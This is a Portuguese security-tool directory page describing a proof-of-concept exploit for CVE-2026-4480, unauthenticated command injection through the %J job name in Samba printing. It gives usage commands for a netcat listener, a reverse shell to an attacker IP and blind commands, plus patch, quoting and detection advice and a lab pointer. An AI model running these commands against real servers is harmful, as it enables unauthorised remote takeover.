Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-4480-PoC — Exploit de prova de conceito para CVE-2026-4480, uma execução remota de comandos não autenticada no subsistema de impressão do Samba via injeção %J. Inclui modos de shell reverso e execução de comandos cega, com orientação de detecção e mitigação. | Kitploit
Ferramentas/GitHubGitHub/thecybergeek/cve-2026-4480-poc
ExploraçãoExploração de Aplicações WebCTFTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubthecybergeek/cve-2026-4480-poc

CVE-2026-4480-PoC

Exploit de prova de conceito para CVE-2026-4480, uma execução remota de comandos não autenticada no subsistema de impressão do Samba via injeção %J. Inclui modos de shell reverso e execução de comandos cega, com orientação de detecção e mitigação.

Ver Repositório
2153há 3 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-4480: PoC de injeção de print-command (%J) no Samba

Importante — Leia isto primeiro:
Este repositório e o exploit.py são fornecidos apenas para fins educacionais e de pesquisa. Não use este código contra sistemas, redes ou serviços para os quais você não tenha autorização explícita e por escrito. O acesso não autorizado a sistemas de computador é ilegal e antiético. Ao usar este código, você concorda em seguir as leis aplicáveis e as políticas institucionais.

Execução remota de comandos não autenticada no subsistema de impressão do Samba. Quando um trabalho de impressão termina de ser spoolado, o Samba executa o print command configurado através de system(), substituindo %s (caminho do arquivo de spool) e %J (nome do trabalho fornecido pelo cliente) na string. Antes da correção, o nome do trabalho era passado com a única transformação ' → e nada mais, portanto , , , espaços, , e crases chegam ao shell. Um que referencia é, portanto, um ponto de injeção no shell e, como convidados podem enviar trabalhos de impressão, o problema é .

_
|
;
&
<
>
print command
%J
pré-autenticação
  • CVE: CVE-2026-4480
  • CVSS: 10.0
  • Corrigido em: Samba 4.22.10, 4.23.8, 4.24.3
  • Afetados: backends de impressão que executam um print command externo que referencia %J (estilo printing = sysv). printing = cups / iprint passam pela API do CUPS e não são afetados.

Requisitos

  • Linux com as bindings Python do Samba:
    root@kitploit:~
    sudo apt install python3-samba
    
  • Acesso de rede à porta SMB do alvo (445/139).
  • Um compartilhamento de impressora acessível por convidado no alvo cujo print command referencie %J.

Uso

root@kitploit:~
python3 exploit.py <rhost> <lhost> <lport> [-P PRINTER] [-c CMD]
Arg / opçãoSignificado
rhostHost / IP do Samba alvo
lhostIP do seu listener
lportPorta do seu listener
-P, --printerNome do compartilhamento de impressora convidado (padrão: HP-Reception)
-c, --cmdExecutar um comando arbitrário em vez de um reverse shell

Reverse shell

root@kitploit:~
# terminal 1: listener
nc -lvnp 4444

# terminal 2: disparar o exploit
python3 exploit.py 10.129.244.177 10.10.14.100 4444

Você deve obter um shell como a conta de serviço de impressão (ex.: nobody).

Executar um comando único (às cegas)

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'id > /dev/shm/o 2>&1'

Como a execução é cega (o comando é executado no servidor e não retorna nada no canal RPC), confirme primeiro fora da banda, ex.: um callback ICMP que você monitora com tcpdump -ni tun0 icmp:

root@kitploit:~
python3 exploit.py 10.129.244.177 x x -c 'ping -c 3 10.10.14.100'

Detecção / mitigação

  • Atualize para 4.22.10 / 4.23.8 / 4.24.3 (ou posterior).
  • Se não puder atualizar, coloque a macro entre aspas: print command = /usr/local/bin/print-helper %s '%J', remova %J ou mude para printing = cups.
  • Procure por smbd gerando shells (sh/bash/nc/python/curl) e nomes de documentos contendo metacaracteres de shell.

Pratique no HackTheBox

Criei uma máquina no HackTheBox chamada Abducted para demonstrar a vulnerabilidade e dar a você um exemplo prático de como atacantes poderiam explorá-la em um ambiente mal configurado.

Baixar ferramenta